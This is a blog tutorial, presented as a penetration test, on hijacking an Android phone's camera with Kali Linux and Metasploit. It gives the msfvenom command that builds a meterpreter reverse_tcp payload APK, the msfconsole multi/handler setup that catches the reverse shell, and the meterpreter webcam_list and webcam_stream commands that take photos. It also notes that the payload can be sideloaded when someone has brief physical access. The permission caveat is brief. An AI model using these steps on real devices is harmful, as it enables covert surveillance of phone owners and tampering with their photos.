How to Run Penetration Test on Android Phone Camera Using Kali Linux

Featured Image Kali Linux Android Camera

There have been several news stories of hackers hijacking Android phone cameras to eavesdrop on their users or supplying them with fake images. As an alert phone owner, you might be looking to prevent that by assessing the likelihood and true risks of such a threat event.

Kali Linux is one of the best tools to check your Android phone camera’s potential vulnerabilities through a penetration test. It can help you stay on top of any hacker attempts to remotely access the phone camera.

Installing an Exploit Payload

To use Kali Linux for a penetration test, first download it from its official site. Refer to this earlier tutorial for the definitions of various jargons such as “msfvenom,” “msfconsole,” “meterpreter,” and more that will be used in this exercise.

The first step in penetration testing is to install a standard exploit payload on the device. For this, open the Kali Linux terminal and enter the following command: ifconfig. This will give you the IP address of your Kali Linux session.

Android Camera Kali Linux Ifconfig

Now enter the command shown below using the above IP address. The port number for exploits, trojans, and other vulnerabilities is generally given as 4444.

msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk

In this step try to inject a metasploit payload, which is based on a Java interpreter. If successful, the penetration test will help you verify whether your phone is vulnerable to someone listening to phone calls, accessing SMS, geo-locating the user, etc.

In this case the attempt is to show how the exploit can be potentially used to access the phone’s cameras.

Android Camera Kali Linux Payload Launch

Once the exploit is initiated, an APK file called “Payload” will be installed in the root folder. You need to install it on a target Android phone. However, it’s easier said than done. Most newer Android phones and email will refuse to carry such malware infected files, and that is a good thing.

However, it can still be achieved through a USB cable or temporary files. If a hacker has access to your phone for a few minutes, that makes it somewhat vulnerable. Our effort here in this penetration test is to determine the precise extent of the risk involved.

Android Camera Kali Linux Payload Installed In Root

Once transferred, you need to find a way to install the payload file on your phone. Unless it’s a very old Android version, your phone should give you several warnings before the APK can be installed. Still, no matter the Android phone version, there are many other ways to install apps from unknown sources in an Android phone.

Payload Installed

Launching the Exploit

To launch the above Payload exploit, insert the following command: msfconsole. It will take just a few seconds for the command to be executed, and the metasploit can be readied for further penetration testing on the phone’s cameras.

Android Camera Kali Linux Msfconsole

The metasploit will give its own complete description. The payload summary is also visible. It shows the number of exploits at work.

Android Camera Kali Linux Msfconsole Launched

In the next step the msfconsole is ready to launch the exploit. For this, refer to the IP address and port number (4444) discussed earlier. Accordingly, enter the following commands:

exploit (multi/handler) > set LHOST "IP Address" [ENTER]
set LPORT "Port number" [ENTER]
exploit [ENTER]
Android Camera Kali Linux Msf5 Launched

When the reverse TCP handler is activated, you will see various stages of the Meterpreter launching itself. Wait for a few seconds while it diagnoses the target phone.

It has to be mentioned here that most modern Android phones will continue to deny this access. Remember this is a penetration test. If your Android phone cannot be penetrated using this lethal APK file, then it means your phone manufacturer is aware of this particular attack vector.

Android Camera Kali Linux Meterpreter Session

Accessing the Android Phone’s Camera

If you were able to successfully insert the exploit in the phone, there is a chance that it can now be penetrated. When that happens, the “meterpreter” on a Kali Linux terminal will be able to establish a connection with the phone. At this point, insert help to access multiple options within the Android phone under attack.

Android Camera Kali Linux Meterpreter Options

Enter the following commands (from the help menu) to access the cameras of your phone. In this exploit there was an attempt to access the back camera to take pictures from the terminal.

webcam_list [ENTER]
1. Back camera
2. Front camera [ENTER]
webcam_stream -i 1

To complete a successful penetration test, once you’re able to access the camera, take a picture and save it in the Kali Linux root folder. You can also edit, rename, or delete the other pictures that are stored. Therefore, any successful penetration on the tested phone is a wake-up call on the likelihood of a real attack, which means it’s time to go for a security patch.

Android Camera Kali Linux Picture Taken Camera

In this tutorial you learned how an Android camera can be accessed from a Kali Linux terminal for penetration testing.

This is a security research article. If you’re accessing someone else’s camera for a demonstration, always get their permission first – unless, of course, it’s your own phone. Don’t forget to check out these hacking apps for Android to help you test and find vulnerabilities in your phone

Subscribe to our newsletter!

Our latest tutorials delivered straight to your inbox

Sayak Boral
Sayak Boral - Staff Writer

Sayak Boral is a technology writer with over eleven years of experience working in different industries including semiconductors, IoT, enterprise IT, telecommunications OSS/BSS, and network security. He has been writing for MakeTechEasier on a wide range of technical topics including Windows, Android, Internet, Hardware Guides, Browsers, Software Tools, and Product Reviews.